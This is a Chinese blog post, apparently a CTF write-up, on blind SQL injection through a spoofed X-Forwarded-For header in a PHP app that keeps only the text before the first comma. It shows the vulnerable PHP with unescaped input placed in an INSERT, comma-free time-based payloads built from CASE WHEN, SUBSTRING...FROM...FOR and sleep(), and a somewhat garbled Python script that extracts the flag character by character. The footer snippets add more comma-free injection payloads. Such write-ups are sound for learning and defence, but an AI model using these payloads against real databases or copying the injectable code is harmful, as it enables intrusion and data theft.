mysql 不能插入逗号_mysql无逗号注入

最新推荐文章于 2021-03-17 12:56:26 发布
最新推荐文章于 2021-03-17 12:56:26 发布
阅读量234 收藏
点赞数
文章标签: mysql 不能插入逗号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998906/article/details/113204722
版权

明天早上满课,然而我三点了还在任性的写代码,真是该剁手,剁手啊…

在一个 ctf比赛中,遇到这样一个注入题:

用户的ip可以用x-forwarded-for来伪造,然后把ip存储到数据库中去,对ip没有进行任何过滤,存在注入,但是有一个限制就是:  用‘,’逗号对ip地址进行分割,仅仅取逗号前面的第一部分内容。

然后:没有报错,没有回显,没有bool,只有延时。 送一个字,坑。。。。。

比赛的时候,就各种纠结,想着怎么绕过逗号,没想出来,比赛结束之后,仔细想想,终于搞明白了,做以下的总结。

据我猜测,后台代码可能是这样的:

error_reporting(0);

function getIp(){

$ip= '';if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){

$ip= $_SERVER['HTTP_X_FORWARDED_FOR'];

}else{

$ip= $_SERVER['REMOTE_ADDR'];

}

$ip_arr= explode(',', $ip);return $ip_arr[0];

}

$host="localhost";

$user="root";

$pass="root";

$db="sangebaimao";

$connect= mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip=getIp();

echo'your ip is :'.$ip;

$sql="insert into client_ip (ip) values ('$ip')";

mysql_query($sql);?>

写一下我的数据库的表结构:

CREATE TABLE IF NOT EXISTS `client_ip` (

`id`int(11) NOT NULL AUTO_INCREMENT,

`ip` varchar(200) DEFAULT NULL,

PRIMARY KEY (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=gbk AUTO_INCREMENT=34;

CREATE TABLE IF NOT EXISTS `flag` (

`flag` varchar(32) DEFAULT NULL

) ENGINE=MyISAM DEFAULT CHARSET=gbk;

INSERT INTO `flag` (`flag`) VALUES

('327a6c4304ad5938eaf0efb6cc3e53dc');

我的目标是注出来flag表中的flag字段。

分析一下:

因为没有报错,没有回显。所以只能是延时盲注。

测试一下:

x-forwarded-for: 10.20.0.12'+sleep(5) and'1'='1

果真延时了,注入是存在的,但是怎么出数据呢???

没有逗号,所以if函数就不能用了。

那用另外一个:

select case when (条件) then 代码1 else 代码 2 end

把判断搞定了,但是怎么截取字符串呢? 截取字符串函数貌似都需要逗号啊!!!

百度了好久,才知道可以这样玩:

select substring((select user()) from 1 for 1); #第一种方法select substring((select user()) from -1); #第二种方法

ded51b8325728499b7d8b46af415de07.png

截取字符串的函数有了,判断也有了。那就搞定了:

找到两种payload

insert into client_ip (ip) values ('ip'+(select case when (substring((select user()) from 1 for 1)='e') then sleep(3) else 0 end)); --第一种payload

insert into client_ip (ip) values ('ip'+(select case when (substring((select user()) from -1)='t') then sleep(3) else 0 end)); --第二种payload

接下来就是写个脚本跑了:

import requests

payload= "qwertyuiopasdfghjklzxcvbnm1234567890"url= "http://127.0.0.1/test1.php"flag= ""

for i in range(50):for j inpayload:

headers= {'HTTP_X_FORWARDED_FOR':"127.0.0.1'"+"(select case when (substring((select flag from flag limit 1) from int(i) for 1)=str(j)) then sleep(6) else 0 end) and '1'='1''"}try:

res= requests.get(url,headers=headers,timeout=4)

except requests.exceptions.ReadTimeout,e:

flag= flag+j

print flagbreak

else:

pass

weixin_39998906
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL查询指定字段不是数字与逗号的sql
09-08
在这个问题中,我们需要找出那些在指定字段中不包含数字或逗号的记录。以下是关于这个主题的详细解释和示例。 首先,我们要理解`REGEXP`运算符的基本用法。`REGEXP`用于测试字符串是否符合特定的模式,如果符合,...
Mysql字段逗号第一个数据的查询语句
09-10
MySQL数据库中,有时我们需要从存储的字段中提取出以逗号分隔的第一个数据。这种情况常见于处理列表型的数据,比如某个字段包含了多个ID,用逗号进行分隔。在这种场景下,`LEFT`函数和`LOCATE`函数就显得尤为...
mysql 不能插入逗号_Mysql 不能使用逗号的情况
weixin_34676685的博客
01-25 589
存在逗号的情况:联合查询:1.UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)盲注:1.select user,password from user where user='' and (sleep(length(user())=14));se...
mybatis向mysql插入含有逗号报错
你究竟是想一辈子卖糖水,还是希望获得改变世界的机会?
07-12 5838
mybatis向mysql插入形如“11,22,33”的时候报错。错误的原因是我用美元符号拼接的sql。正确做法是用#  有时间看看mybatis的$和#的区别。
mysql逗号_在mysql插入多行(用逗号分隔的项目)
weixin_34603379的博客
01-19 535
I have a small problem :) I was searching the web but didn't find any solutions.I have a value like this (got it from $_GET[])tag1, tag2, tag3, tag4and all I want to do is insert it into MySql (via PH...
mysql 数据字典 逗号,mybatis向mysql插入含有逗号报错,mybatismysql
weixin_34530164的博客
03-17 1050
mybatis向mysql插入含有逗号报错,mybatismysqlmybatis向mysql插入形如“11,22,33”的时候报错。错误的原因是我用美元符号拼接的sql。正确做法是用# 有时间看看mybatis的$和#的区别。mysql 用mybatis添加 报错 指点--> 检查 --> jdbc 是否导入 classpath?--> 另外, 可能是你的sql stat...
mysql无法在表中_针对mysql数据库无法在表中插入中文字符的解决方案(彻底解决:java.sql.SQLException: Incorrect string value: ‘\xF0\x9F\...
weixin_39732316的博客
02-02 132
数据库在进行insertinto语句时,有时候会给出这样的提示:这是因为name这一列在创建表时我们定义为varchar(20)。但是数据库的编码不是utf8,所以不允许进行中文字符的添加。我们可以通过show variables like '%char%'来查看默认的字符集我们可以看到这是我更改后的 。character _set_database为utf8字符集类型。所以可以进行中文...
MySql逗号拼接字符串查询的两种方法
09-09
MySQL中,有时候我们需要对字符串进行处理,特别是当我们要查询某个字段是否包含在另一组逗号分隔的字符串中时。本篇文章将详细介绍两种在MySQL中实现逗号拼接字符串查询的方法。 首先,我们来看第一种方法。...
mysql split函数用逗号分隔的实现
12-14
这里我们将详细讲解如何在MySQL中实现一个用逗号分隔的`split`函数。 首先,我们创建一个存储过程`splitString`,这个过程接受两个参数:要分割的字符串`f_string`和作为分隔符的字符`f_delimiter`。存储过程的定义...
MySQL不使用逗号_Mysql 不能使用逗号的情况
weixin_30666407的博客
02-03 498
存在逗号的情况:联合查询:1.UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)盲注:1.select user,password from user where user=‘‘ and (sleep(length(user())=14));se...
mysql的导入出现大量错误_分析Mysql大量数据导入遇到的问题以及解决方案
weixin_29420299的博客
01-27 1829
在项目中,经常会碰到往数据库中导入大量数据,以便利用sql进行数据分析。在导入数据的过程中会碰到一些需要解决的问题,这里结合导入一个大约4G的txt数据的实践,把碰到的问题以及解决方法展现出来,一方面自己做个总结记录,另一方面希望对那些碰到相同问题的朋友有个参考。我导入的数据是百科的txt文件,文件大小有4G多,数据有6500万余条,每条数据通过换行符分隔。每条数据包含三个字段字段之间通过Tab...
Python努力学习笔记(第九课)
weixin_42702530的博客
10-07 341
Python小白学习Python学习第九课1. 函数的返回2. ⽂档字符串3. 函数的作⽤域4. 命名空间5. 递归函数6. 作业1. 用函数实现一个判断用户输入的年份是否是闰年的程序2. 猴子吃桃问题(递归): Python学习第九课 1. 函数的返回 2. ⽂档字符串 help()是Python中内置函数,通过help()函数可以查询Python中函数的⽤法 在定义函数时,可以在函数内部编写⽂档字符串,⽂档字符串就是对函数的 说明 3. 函数的作⽤域 作⽤域(scope) 作⽤域指的是变量⽣效的区
mysql数据库能存逗号
最新发布
07-28
回答: 是的,MySQL数据库可以存储逗号逗号MySQL中被视为普通的字符,可以作为数据的一部分存储在数据库中。逗号在数据库中有特殊的含义,它只是一个普通的字符。所以,如果你需要在MySQL数据库中存储逗号,只需将逗号作为字符串的一部分插入到相应的字段中即可。 #### 引用[.reference_title] - *1* *2* *3* [MySQL数据库面试题(2020最新版)](https://blog.csdn.net/ThinkWon/article/details/104778621)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值